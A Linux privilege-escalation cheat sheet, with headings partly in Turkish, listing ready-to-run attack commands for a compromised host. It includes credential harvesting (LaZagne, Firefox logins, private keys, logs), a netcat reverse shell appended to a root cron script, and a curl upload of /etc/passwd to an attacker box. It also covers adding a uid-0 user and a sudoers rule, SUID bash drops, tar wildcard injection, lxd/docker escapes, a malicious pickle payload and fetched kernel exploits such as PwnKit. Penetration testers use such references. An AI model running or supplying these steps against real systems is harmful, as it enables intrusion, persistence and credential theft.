Linux Privilege Escalation
Shell Upgrade
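# If python is available: spawn a real pty so su/sudo/ssh password prompts work
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
# If python is missing: util-linux `script` can allocate the pty instead
script /dev/null -qc /bin/bash
# Then press Ctrl+Z (a keypress, not a command) to background the shell and,
# ON THE ATTACKER TERMINAL, read its size. The output is "<rows> <columns>"
# and is what goes into the `stty rows ... columns ...` line below.
stty size
# Put the attacker terminal in raw mode and bring the shell back; `ls` just
# repaints the prompt after fg.
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
# Replace 181/42 with the values printed by `stty size`, then reset the terminal.
stty rows 181 columns 42; reset;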
Kullanıcı ve Gruplar
id # current uid/gid and group memberships (sudo, docker, lxd, disk, adm are the interesting ones; see below)
env # environment variables (may hold credentials, tokens or odd PATH entries)
history # command history of the current user (often empty in a non-interactive shell; .bash_history is read further down)
getent group sudo # members of the sudo group
lastlog # last login of every user
w # users currently logged in
cat /etc/passwd # all users
cat /etc/group # all groups
realm list # AD domain membership, if the host is joined
klist # cached Kerberos tickets of the current user
Sistem Bilgileri
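hostname # hostname
uname -a # kernel version (input for the kernel-exploit section below)
cat /etc/os-release # distribution and version
cat /etc/issue # banner shown on the login screen
cat /etc/shells # valid login shells
cat /etc/fstab # filesystems mounted at boot (credentials in CIFS/NFS entries, noexec on /tmp)
dpkg -l # installed packages (Debian-based; rpm -qa on RHEL-based)
echo $PATH # PATH (a writable or relative entry is a command-hijack opportunity)
mount # currently mounted filesystems
lsblk # block devices
lsmod # loaded kernel modules
/sbin/modinfo libata # details of one module
ps aux # all processes (root-owned services, passwords on command lines)
pspy64 # watch processes and cron activity without root
timeout 20 ./pspy64 # run it for 20 seconds only
# Keyword search across the filesystem. -r (not -R) plus --exclude-dir keep grep
# out of /proc, /sys and /dev, where -R would read device nodes such as
# /dev/zero and never finish; -I skips binary files.
grep -rIil --exclude-dir={proc,sys,dev,run} "aranacak_kelime" / 2>/dev/null
find / -type f -name flag.txt 2>/dev/null # file search
# World-writable scratch directories: leftover scripts, sockets, other users' files
ls -la /tmp /var/tmp /dev/shm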
Ağ Bilgileri
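# Network interfaces
ip a
ifconfig -a # (was "ifconfig a": "a" is not an option)
arp -a # neighbours seen recently: candidate hosts to pivot to
# Listening / open ports. A service bound to 127.0.0.1 only is a classic
# local-only target that port scans from outside never showed.
netstat -punta
ss -tulpn
# Routing table
route
ip route
cat /etc/networks
# Firewall rules (the file may not exist; the live ruleset needs root)
cat /etc/iptables/rules.v4
iptables -S 2>/dev/null
nft list ruleset 2>/dev/null
# Credentials sent in clear text over loopback (needs root / cap_net_raw).
# -l line-buffers stdout so grep shows hits immediately; -i catches "Password:".
sudo tcpdump -i lo -A -l | grep -i "pass"
cat /etc/hosts # static name resolution (internal hostnames)
cat /etc/resolv.conf # DNS servers and search domain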
Dosya Transferi
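# HTTP download: serve the file from the attacker box ...
python3 -m http.server 80
# ... and fetch it on the target. Plain HTTP, no integrity check: only pull
# from a host you control. /dev/shm is useful when /tmp is mounted noexec.
wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh
wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh
curl -L 192.168.1.2/linpeas.sh -o /tmp/linpeas.sh
# Piping straight into bash runs whatever the server returns without touching
# disk. Fine for your own server, never for a third-party URL.
curl -L 192.168.1.2/linpeas.sh | bash
# Base64 copy/paste (no network tooling needed): encode on one side ...
base64 -w 0 id_rsa; echo
# ... decode on the other. ssh refuses a key that is group/world readable.
echo -n 'BASE64' | base64 -d > id_rsa; chmod 600 id_rsa
# Netcat: start the receiver first, then the sender.
# -q 0 exits right after EOF (not every netcat build supports -q).
nc -lvnp 1234 > file.txt
nc -q 0 192.168.1.3 1234 < file.txt
# HTTPS upload with a self-signed cert, so loot does not cross the wire in clear text
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
python3 -m uploadserver 443 --server-certificate ~/server.pem
# --insecure skips certificate verification because the cert is self-signed;
# the server is ours, so this only drops the check, not the encryption.
curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure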
Önemli Dizinler ve Kimlik Bilgisi Avı
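# LaZagne dumps locally stored credentials (browsers, mail clients, wifi, ...)
python2.7 laZagne.py all
python3 laZagne.py browsers
# Firefox saved logins: locate the profile directory, then read logins.json.
# The profile id (e.g. 1bplpd86) differs per install, so glob for it.
ls -l ~/.mozilla/firefox/ | grep default
cat ~/.mozilla/firefox/*.default-release/logins.json | jq .
# logins.json holds encrypted blobs; firefox_decrypt needs the profile
# directory (key4.db lives there) to recover the clear-text passwords.
python3.9 firefox_decrypt.py ~/.mozilla/firefox/*.default-release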
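# Config files by extension. The glob is quoted so the shell does not expand
# *$l against the current directory before find ever sees it.
for l in .conf .config .cnf; do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done
# Credentials inside *.cnf files (MySQL client configs etc.). Paths are read
# line by line (no word splitting on spaces); only real comment lines are dropped,
# so a password containing '#' is not silently filtered out.
find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib" | while read -r i; do echo -e "\nFile: $i"; grep -i "user\|password\|pass" "$i" 2>/dev/null | grep -v "^\s*#"; done
# Anything named *config* (outside /proc, which is only noise)
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null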
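# Database files (.sql, .db, sqlite-style names). Each pattern is quoted so
# neither the loop list nor the find argument is glob-expanded by the shell.
for l in '.sql' '.db' '.*db' '.db*'; do echo -e "\nDB File extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done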
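# Notes: text files and extension-less files under the home directories.
# The parentheses are required: -o binds looser than the implicit -a, so
# without them the "! -name" alternative is not restricted to -type f and
# matches directories as well.
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null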
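# Scripts and sources: may embed credentials, or be the thing cron runs as root
for l in .py .pyc .pl .go .jar .c .sh; do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share"; done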
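# Private keys. The PEM header sits on line 1, so filter on ":1:" exactly;
# a bare ":1" also matches lines 10, 11, 100, ...
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1:"
grep -rnw --exclude-dir={proc,sys,dev} "PRIVATE KEY" /* 2>/dev/null | grep ":1:"
# Public keys / authorized_keys. ed25519 is the modern default, not only RSA.
grep -rnw "ssh-rsa\|ssh-ed25519" /home/* 2>/dev/null | grep ":1:"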
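# Shell history: .bash_history plus .bashrc/.bash_profile (aliases and exports
# with passwords), other tools' history files (.mysql_history, .python_history)
# and root's, in case it is readable.
tail -n5 /home/*/.bash* /home/*/.*_history /root/.bash* 2>/dev/null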
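# Office documents, spreadsheets and PDFs. Each pattern is quoted so the
# wildcards reach find instead of being expanded against the current directory.
for ext in '.xls' '.xls*' '.xltx' '.csv' '.od*' '.doc' '.doc*' '.pdf' '.pot' '.pot*' '.pp*'; do echo -e "\nFile extension: $ext"; find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done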
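# Log files (readability depends on group membership: adm on Debian/Ubuntu)
cat /var/log/messages
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/secure
cat /var/log/boot.log
cat /var/log/dmesg
cat /var/log/kern.log
cat /var/log/faillog
cat /var/log/cron
cat /var/log/mail.log
# Web server logs are directories, not a single file (was "cat /var/log/httpd")
ls -la /var/log/httpd /var/log/apache2 /var/log/nginx 2>/dev/null
cat /var/log/mysqld.log
cd /var/spool/mail # mailboxes
# Environment and command line of ANOTHER process (a running service).
# /proc/self would only show this shell. Both files are NUL-separated,
# hence the tr. Set PID to the target process first (from ps aux).
tr '\0' '\n' < /proc/$PID/environ
tr '\0' ' ' < /proc/$PID/cmdline; echo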
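# Log search for authentication / privilege events. The pattern lives in one
# variable so it is not duplicated; the file list is a glob instead of parsed
# `ls` output (which also listed sub-directory contents without their path);
# grep -q decides whether a file is worth printing, then the hits are shown.
PAT="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs"
for i in /var/log/*; do [ -f "$i" ] || continue; if grep -q "$PAT" "$i" 2>/dev/null; then echo -e "\n#### Log file: $i"; grep "$PAT" "$i" 2>/dev/null; fi; done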
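# Kerberos keytabs: a readable keytab is that principal's long-term credential
find / -name "*keytab*" -ls 2>/dev/null
# Domain credentials cached by sssd/Kerberos on a domain-joined host (needs root)
./linikatz.sh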
CronJobs
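cat /etc/crontab
ls -lah /etc/cron* # system cron directories (cron.d, cron.hourly, ...)
cat /var/spool/cron/crontabs/root 2>/dev/null # root's crontab (Debian layout; needs root)
cat /var/spool/cron/root 2>/dev/null # same on RHEL-style layouts
crontab -l # current user's crontab
sudo crontab -l # root's crontab, if sudo allows it
grep "CRON" /var/log/syslog # cron activity in the system log
systemctl list-timers --all 2>/dev/null # systemd timers: the modern equivalent of cron jobs
./pspy64 -pf -i 1000 # watch processes: reveals jobs whose definitions we cannot read
# Every cron/at/anacron definition, comments stripped
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"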
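# Reverse shell via a writable script that root's cron runs. Start the
# listener first (nc -lvnp 1234 on 192.168.1.3). `>>` appends, so the job
# keeps doing its normal work and the change is less conspicuous than
# overwriting the file; if the script exits early, overwrite with `>` instead.
ls -la /home/john/backup.sh # confirm it is writable by us (owner, or a group we are in)
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" >> /home/john/backup.sh
# Root shell: have the job drop a SUID copy of bash. -p keeps the effective
# uid (root) instead of letting bash drop it at startup.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/john/backup.sh
/tmp/bash -ip
# sudo rule: the inner `>> /etc/sudoers` stays inside the quotes so it runs
# when cron executes the script (as root), not now. Check with `sudo -l` afterwards.
echo 'echo "john ALL=NOPASSWD:ALL" >> /etc/sudoers' >> /home/john/backup.sh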
World Writable Dosyalar
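# World-writable / writable-by-us files outside pseudo-filesystems and our own home
find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null
# If /etc/passwd is WRITABLE we can add a second uid-0 user: a hash in the
# second field of passwd takes precedence over the shadow entry. -6 requests
# sha512crypt (OpenSSL >= 1.1.1; older builds default to MD5-crypt, which
# glibc still accepts).
openssl passwd -6 password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
# Or with an empty password field. PAM may refuse empty passwords for su
# (no nullok), in which case fall back to the hashed variant above.
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd
# If /etc/shadow is writable: generate a hash and paste it into root's entry
mkpasswd -m yescrypt password
nano /etc/shadow
# Previous passwords (kept by pam_unix remember= / pam_pwhistory): good reuse candidates
cat /etc/security/opasswd
# Offline cracking. hashcat -m 1800 is sha512crypt ($6$...) only; yescrypt
# ($y$...) is not a hashcat mode, use john for those. Adjust the wordlist path
# to your install (Kali: /usr/share/wordlists/rockyou.txt).
unshadow passwd shadow > unshadowed.hashes
hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt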
SUID Binary
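# SUID / SGID files owned by root. `-perm -6000` would require BOTH bits to be
# set; `/6000` matches either, `-4000` is SUID only.
find / -type f -user root -perm -4000 2>/dev/null
find / -type f -user root -perm /6000 2>/dev/null
# These are normally present and are not findings by themselves (still check
# their versions: pkexec -> PwnKit, sudo -> CVE-2021-3156, both below).
# Listed as comments so a paste does not execute them.
#   /usr/bin/chfn /usr/bin/chsh /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/pkexec
#   /usr/bin/passwd /usr/bin/sudo /bin/su /bin/mount /bin/umount
# Anything else: look it up on GTFOBins, or check whether the SUID binary
# executes/sources a file that we can write to.
ls -la backup.sh # the SUID file
ls -la backup.config # the file it executes; must be writable by us
cp /bin/bash backup.config # (was "cp /bin/bash > backup.config", which only redirects cp's stdout and fails for lack of a destination)
./backup.sh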
SUDO
Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.
sudo -l # lists what this user may run via sudo and whether a password is required
# A NOPASSWD root entry for a script or binary is a shell if that program can spawn one.
# "-c /bin/bash" only helps when backup.sh hands its arguments to a shell;
# read the script first, and look the binary up on GTFOBins.
sudo /usr/bin/backup.sh -c /bin/bash
Binary Capabilities
GTFOBins: https://gtfobins.github.io/
# File capabilities. cap_setuid, cap_dac_read_search, cap_sys_admin and the like
# on a binary we can run are the interesting ones (GTFOBins has a capabilities column).
/usr/sbin/getcap -r / 2>/dev/null
# Expected on most systems, not a finding:
#/usr/bin/ping = cap_net_raw+ep
#/usr/bin/mtr-packet = cap_net_raw+ep
Wildcard Abuse
Eğer root olarak çalışan bir cronjob, bizim yazabildiğimiz bir dizinde `tar ... *` gibi joker (*) karakteri kullanıyorsa, aşağıdaki exploit uygulanabilir: dosya adları tar'a seçenek olarak geçer ve --checkpoint-action ile komut çalıştırılır (yalnızca tar için geçerlidir).
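# Run these in the directory where the cron job's "tar ... *" expands. The
# shell passes the file names as arguments, tar parses them as options, and
# shell.sh is executed at the first checkpoint with the job's privileges.
echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod +x shell.sh # executable is enough; 777 is noisier than needed
# Wait for the job to fire, then use the SUID copy (-p keeps the root euid):
/tmp/bash -ip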
Yetkili Gruplar
id
# lxd group: a privileged container with the host's / mounted is root on the host.
# alpine.tar.gz is an image prepared on the attacker box (e.g. with distrobuilder)
# and transferred to the target.
lxc image import alpine.tar.gz --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/bash
# docker group: same idea through the docker socket. Pick an image that is
# already present (docker image ls) if the host cannot pull from the internet.
docker image ls
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
# disk group: raw read access to the block devices listed by lsblk bypasses file permissions
# adm group: may read the logs under /var/log (see the log section above)
cd /var/log
Screen Privilege Esc
# Third-party exploit script executed blindly. Read it (cat/less) before
# running it, and only use it when `screen -v` really reports 4.5.0.
wget https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/refs/heads/main/exploit.sh
bash exploit.sh
Logrotten
# Works when logrotate uses "create" or "compress" and rotates a log in a
# directory we can write to; also check /etc/logrotate.d/* for per-service configs
grep "create\|compress" /etc/logrotate.conf | grep -v "#"
wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c
gcc logrotten.c -o logrotten -static
# -p is the payload file written on rotation (here a reverse-shell script);
# the last argument is the log file that logrotate rotates (per the tool's usage)
./logrotten -p ./reverse /tmp/tmp.log
Shared Object Hijacking
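# Which shared libraries the binary loads and from where. Note that ldd can
# run the binary's dynamic loader, so on an untrusted binary prefer objdump.
ldd payroll
objdump -p payroll | grep NEEDED
# RPATH/RUNPATH: a library search directory we can write to lets us supply
# our own copy of a library the binary needs (the file name must match exactly).
readelf -d payroll | grep PATH
gcc rev.c -fPIC -shared -o /development/libshared.so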
Python Module Permission
# Script (run by root via cron/sudo) that imports a third-party module;
# the module's files are the attack surface if we can write to them.
import psutil
available_memory = psutil.virtual_memory()
grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/* # locate the function the script calls
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py # the file (or its directory) must be writable by us
vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py # insert the payload at the top of virtual_memory()
# Payload inserted into the module; runs with the privileges of whoever
# imports it (make sure `os` is imported in that file).
os.system('id')
Automated
# Local (attacker) side: stage the enumeration scripts and serve them
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas . # path differs per distro/version; `locate linpeas` if missing
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80
# Target side: fetch, mark executable, run. Use /dev/shm if /tmp is mounted noexec.
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check
chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check
./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt # these scripts are noisy; expect them in logs and EDR telemetry
Firefox Creds
Decrypter: https://github.com/unode/firefox_decrypt
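# Firefox profile loot (the profile directory name varies: *.default-esr,
# *.default-release). The sqlite files are binary; use sqlite3, or copy them
# out and open them locally if sqlite3 is not installed.
cat /root/.mozilla/firefox/*.default-esr/logins.json # saved logins (encrypted blobs)
sqlite3 /root/.mozilla/firefox/*.default-esr/cookies.sqlite .dump # session cookies
sqlite3 /root/.mozilla/firefox/*.default-esr/formhistory.sqlite .dump # form autofill history
# key4.db holds the key that protects logins.json; firefox_decrypt combines both
python3 firefox_decrypt.py /root/.mozilla/firefox/*.default-esr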
Kernel Exploit
cat /etc/issue # distro banner
cat /etc/lsb-release # distro and release
uname -r # kernel version: the input for the search below
# Match the exploit to the exact kernel/distro version. Kernel exploits can
# crash the host; run them last and only when nothing softer works.
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
# Serve the source from the attacker box and compile it on the target
# (needs gcc there; otherwise build it on a matching box, statically)
python -m http.server 80
wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
Sudo < 1.9.5p2
CVE-2021-3156: https://github.com/worawit/CVE-2021-3156
# Quick check: a vulnerable sudo segfaults with "sudoedit: /: not a regular file";
# a patched one prints a usage message instead. Trust this over the version
# string, since distros backport the fix without bumping the version.
sudoedit -s /
sudo --version
sudo -V
python3 sudo_lpe.py
Dirty Pipe
Checker: https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
DirtyPipe: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
uname -r # target kernel (the CVE-2022-0847 advisory lists 5.8 up to the 5.16.11 / 5.15.25 / 5.10.102 fixes as affected)
dpipe.sh 5.10.0 # run the checker locally against that version string
gcc exploit-1.c -o dpipe1 -static
gcc exploit-2.c -o dpipe2 -static
./dpipe1 # presumably the /etc/passwd variant of the exploit repo -- verify before use
./dpipe2 /usr/bin/su # SUID-binary variant; the overwrite lives in the page cache only, so it does not survive a reboot
Screen 4.5.0
Exploit: https://github.com/YasserREED/screen-v4.5.0-priv-escalate
Pwnkit
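# Pre-built binary from a third-party repo: you cannot review what it does, so
# prefer compiling the PoC from source when you can. wget does not set the
# exec bit, so the chmod is required before running it.
wget https://github.com/ly4k/PwnKit/raw/refs/heads/main/PwnKit
chmod +x PwnKit
./PwnKit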
Pickle Priv Esc
import torch
import os
class Payload:
    """Pickle gadget: loading this object runs ``os.system("whoami")``.

    ``__reduce__`` tells pickle how to rebuild the object; returning a
    callable plus its argument tuple makes the loader call it. Whoever
    ``torch.load``s / ``pickle.load``s evil.pth executes the command with
    their own privileges (e.g. root, via a cron-run training script).
    NOTE(review): recent torch releases default ``torch.load`` to
    ``weights_only=True``, which refuses arbitrary callables -- confirm the
    target's torch version before relying on this.
    """

    def __reduce__(self):
        command = ("whoami",)
        return os.system, command


# Serialise the gadget; the resulting file is an ordinary pickle in a zip container.
evil = Payload()
torch.save(evil, "evil.pth")
APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)
cd /etc/apt/apt.conf.d
# Pre-Invoke hooks run as root on every `apt-get update`, so a cron'd update
# executes "revshell" (replace it with a real command, e.g. the mkfifo reverse
# shell above). Only works if this directory is writable by us.
echo 'apt::Update::Pre-Invoke {"revshell"};' > shell